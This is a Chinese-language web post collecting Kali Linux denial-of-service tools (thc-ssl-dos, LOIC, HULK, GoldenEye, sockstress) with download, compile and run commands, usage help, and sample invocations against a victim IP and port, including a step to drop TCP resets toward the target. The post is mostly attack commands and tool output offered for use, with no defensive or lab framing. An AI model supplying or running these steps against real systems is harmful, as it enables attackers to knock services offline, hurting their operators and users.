Kali-DDoS工具集合(kali下经典的ddos攻击软件)

网友投稿 3014 2022-10-09


Kali-DDoS工具集合(kali下经典的ddos攻击软件)

1、SSL连接耗尽工具(thc-ssl-dos)

root@kali:~/DDoS_tool/web# thc-ssl-dos -h      ______________ ___  _________      \__    ___/   |   \ \_   ___ \        |    | /    ~    \/    \  \/        |    | \    Y    /\     \____        |____|  \___|_  /  \______  /                      \/          \/             http://thc.org           Twitter @hackerschoice Greetingz: the french underground ./thc-ssl-dos [options]                                    #使用实例:thc-ssl-dos 192.168.57.100 80   -h      help                                                      -l   Limit parallel connections [default: 400]                #并发连接数

2、LOIC低轨道加农炮

apt install mono-xbuild mono-mcs mono-devel                          #安装依赖环境 wget https://codeload.github.com/NewEraCracker/LOIC/zip/master                #下载LOIC程序 unzip master  cd LOIC-master/ ./loic-net4.5.sh run                                     #运行程序

3、HULK(Http Unbearable Load King) 7层DoS工具

wget https://packetstormsecurity.com/files/download/112856/hulk.zip         #hulk下载 unzip hulk.zip root@kali:~/DDoS_tool/web# python hulk.py --------------------------------------------------- USAGE: python hulk.py  you can add "safe" after url, to autoshut after dos

4、GoldenEye 7层DoS工具

wget https://github.com/jseidl/GoldenEye/archive/master.zip  unzip master.zip root@kali:~/DDoS_tool/GoldenEye-master#  python goldeneye.py Please supply at least the URL ----------------------------------------------------------------------------------------------------------- GoldenEye v2.1 by Jan Seidl   USAGE: ./goldeneye.py  [OPTIONS]  OPTIONS:          Flag                   Description                                             Default          -u, --useragents       File with user-agents to use                            (default: randomly generated)          -w, --workers          Number of concurrent workers                            (default: 10)          -s, --sockets          Number of concurrent sockets                            (default: 500)          -m, --method           HTTP Method to use 'get' or 'post'  or 'random'         (default: get)          -n, --nosslcheck       Do not verify SSL Certificate                           (default: True)          -d, --debug            Enable Debug Mode [more verbose output]                 (default: False)          -h, --help             Shows this help -----------------------------------------------------------------------------------------------------------

5、sockstress Syn-flood工具(基于C语言开发的)

wget https://codeload.github.com/defuse/sockstress/zip/master  unzip master cd sockstress-master/  gcc -Wall -c sockstress.c gcc -pthread -o sockstress sockstress.o  ./drop.sh IP                                                                       #跟上要攻击的目标(防止对目标发送RST包,避免被目标关闭连接) ./sockstress -h                                                                    #查看帮助信息 SOCKSTRESS - CVE-2008-4609 | havoc@defuse.ca Usage: ./sockstress :  [-p payload] [-d delay]                     Victim IP address                   Victim port              Local network interface (e.g. eth0)         -p payload      File containing data to send after connecting                         Payload can be at most 1000 bytes         -d delay        Microseconds between SYN packets (default: 10000)         -h              Help menu  **You must configure your firewall to drop TCP reset packets sent to **


版权声明:本文内容由网络用户投稿,版权归原作者所有,本站不拥有其著作权,亦不承担相应法律责任。如果您发现本站中有涉嫌抄袭或描述失实的内容,请联系我们jiasou666@gmail.com 处理,核实后本网站将在24小时内删除侵权内容。

上一篇:SSL自制证书、springboot使用(springboot ssl证书)
下一篇:ASA防火墙之日志管理(asa防火墙查看日志)
相关文章

 发表评论

暂时没有评论,来抢沙发吧~